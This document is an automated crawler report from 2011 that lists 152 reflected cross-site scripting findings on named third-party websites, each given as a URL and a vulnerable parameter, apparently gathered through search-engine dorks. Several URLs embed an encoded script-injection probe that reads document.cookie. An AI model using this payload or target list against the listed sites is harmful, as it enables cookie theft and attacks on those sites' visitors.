XSS, Cross Site Scripting, DORK Report, CWE-79, CAPEC-86

XSS Report of DORK Searches | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sat Feb 05 07:26:39 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://app.quotemedia.com/quotetools/clientForward [REST URL parameter 1]

1.2. http://ar.voicefive.com/b/rc.pli [func parameter]

1.3. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]

1.4. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]

1.5. http://blog.sherifmansour.com/ [name of an arbitrarily supplied request parameter]

1.6. http://digg.com/submit [REST URL parameter 1]

1.7. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 2]

1.8. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 3]

1.9. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 4]

1.10. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 2]

1.11. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 3]

1.12. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 4]

1.13. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 2]

1.14. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 3]

1.15. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 4]

1.16. http://goop.com/ [name of an arbitrarily supplied request parameter]

1.17. http://goop.com/css/global.css [REST URL parameter 1]

1.18. http://goop.com/css/global.css [REST URL parameter 2]

1.19. http://goop.com/favicon.ico [REST URL parameter 1]

1.20. http://goop.com/js/AC_RunActiveContent.js [REST URL parameter 1]

1.21. http://goop.com/js/AC_RunActiveContent.js [REST URL parameter 2]

1.22. http://img.mediaplex.com/content/0/15017/120648/2302-rsa-banner-728x90.js [mpck parameter]

1.23. http://img.mediaplex.com/content/0/15017/120648/2302-rsa-banner-728x90.js [mpvc parameter]

1.24. http://intensedebate.com/comment/dd5b14065e2bc9e2bfced67832069618/generic/73522711 [REST URL parameter 1]

1.25. http://intensedebate.com/empty.php [REST URL parameter 1]

1.26. http://intensedebate.com/empty.php [name of an arbitrarily supplied request parameter]

1.27. http://intensedebate.com/fb-connect/fbConnect.php [REST URL parameter 2]

1.28. http://intensedebate.com/fb-connect/fbConnect.php [name of an arbitrarily supplied request parameter]

1.29. http://intensedebate.com/fb-connect/getFB.php [REST URL parameter 2]

1.30. http://intensedebate.com/fb-connect/getFB.php [name of an arbitrarily supplied request parameter]

1.31. http://intensedebate.com/idc/js/comment-func.php [REST URL parameter 3]

1.32. http://intensedebate.com/idc/js/comment-func.php [name of an arbitrarily supplied request parameter]

1.33. http://intensedebate.com/js/genericCommentWrapper2.php [REST URL parameter 2]

1.34. http://intensedebate.com/js/genericCommentWrapper2.php [name of an arbitrarily supplied request parameter]

1.35. http://intensedebate.com/js/getUserMenu.php [REST URL parameter 2]

1.36. http://intensedebate.com/js/getUserMenu.php [name of an arbitrarily supplied request parameter]

1.37. http://intensedebate.com/logmein [REST URL parameter 1]

1.38. http://intensedebate.com/logmein [name of an arbitrarily supplied request parameter]

1.39. http://itknowledgehub.com/ [name of an arbitrarily supplied request parameter]

1.40. http://jlinks.industrybrains.com/jsct [ct parameter]

1.41. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

1.42. http://jlinks.industrybrains.com/jsct [tr parameter]

1.43. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 4]

1.44. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]

1.45. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]

1.46. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]

1.47. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 6]

1.48. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 6]

1.49. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 7]

1.50. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 7]

1.51. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]

1.52. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]

1.53. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]

1.54. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 9]

1.55. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 4]

1.56. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 5]

1.57. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 6]

1.58. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 7]

1.59. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 8]

1.60. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 [REST URL parameter 9]

1.61. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 4]

1.62. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 5]

1.63. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 6]

1.64. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 7]

1.65. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 8]

1.66. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 [REST URL parameter 9]

1.67. http://pcgro.com/ [name of an arbitrarily supplied request parameter]

1.68. http://s.intensedebate.com/css/base.css [REST URL parameter 2]

1.69. http://s.intensedebate.com/css/ie6.css [REST URL parameter 2]

1.70. http://s.intensedebate.com/css/sys.css [REST URL parameter 2]

1.71. http://s.intensedebate.com/images/avatar-compact.png/ [REST URL parameter 1]

1.72. http://s.intensedebate.com/images/avatar-compact.png/ [REST URL parameter 2]

1.73. http://s.intensedebate.com/images/avatar-compact.png/ [name of an arbitrarily supplied request parameter]

1.74. http://s.intensedebate.com/images/twitter-favicon.ico [REST URL parameter 2]

1.75. http://s.intensedebate.com/js/idm-combined.js [REST URL parameter 2]

1.76. http://shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 1]

1.77. http://shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 1]

1.78. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 1]

1.79. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images [REST URL parameter 2]

1.80. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 1]

1.81. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 2]

1.82. http://thefastertimes.com/about/ [name of an arbitrarily supplied request parameter]

1.83. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 1]

1.84. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 2]

1.85. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 3]

1.86. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 4]

1.87. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 5]

1.88. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 6]

1.89. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [name of an arbitrarily supplied request parameter]

1.90. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 parameter]

1.91. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 10]

1.92. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 11]

1.93. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 12]

1.94. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 13]

1.95. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 14]

1.96. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 1]

1.97. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 2]

1.98. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 3]

1.99. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 4]

1.100. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 5]

1.101. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 6]

1.102. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 7]

1.103. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 8]

1.104. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 9]

1.105. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [name of an arbitrarily supplied request parameter]

1.106. http://thefastertimes.com/wp-content/plugins/g-lock-double-opt-in-manager/js/glock2.min.js [REST URL parameter 1]

1.107. http://thefastertimes.com/wp-login.php [REST URL parameter 1]

1.108. http://thefastertimes.com/xmlrpc.php [REST URL parameter 1]

1.109. http://whitepapers.scmagazineuk.com/email_this_page.php [name of an arbitrarily supplied request parameter]

1.110. http://whitepapers.scmagazineuk.com/email_this_page.php [url parameter]

1.111. http://whitepapers.scmagazineuk.com/index.php [limit parameter]

1.112. http://whitepapers.scmagazineuk.com/index.php [sort parameter]

1.113. http://www.astaro.com/newsletter [uid parameter]

1.114. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]

1.115. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]

1.116. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]

1.117. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]

1.118. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]

1.119. http://www.blogtalkradio.com/ajax2.aspx [JSONCallback parameter]

1.120. http://www.blogtalkradio.com/ajax2.aspx [ctx parameter]

1.121. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming [REST URL parameter 3]

1.122. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming [REST URL parameter 4]

1.123. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 [REST URL parameter 3]

1.124. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 [REST URL parameter 4]

1.125. http://www.businesswire.com/news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp [REST URL parameter 3]

1.126. http://www.businesswire.com/news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp [REST URL parameter 4]

1.127. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId parameter]

1.128. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang parameter]

1.129. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink parameter]

1.130. http://www.dinclinx.com/ [name of an arbitrarily supplied request parameter]

1.131. http://www.ereadable.com/scripts/browse.asp [source parameter]

1.132. http://www.haymarketbusinesssubs.com/subscriptions/ [cat parameter]

1.133. http://www.haymarketbusinesssubs.com/subscriptions/ [fuseaction parameter]

1.134. http://www.haymarketbusinesssubs.com/subscriptions/ [itemID parameter]

1.135. http://www.haymarketbusinesssubs.com/subscriptions/ [name of an arbitrarily supplied request parameter]

1.136. http://www.installsoftware.com/favicon.ico [REST URL parameter 1]

1.137. http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformation/security_software [REST URL parameter 1]

1.138. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]

1.139. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]

1.140. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]

1.141. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 1]

1.142. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 2]

1.143. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 3]

1.144. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 1]

1.145. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 2]

1.146. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 3]

1.147. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 4]

1.148. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [REST URL parameter 5]

1.149. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css [name of an arbitrarily supplied request parameter]

1.150. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 1]

1.151. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 2]

1.152. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/css/comfeed.css/page/2 [REST URL parameter 3]

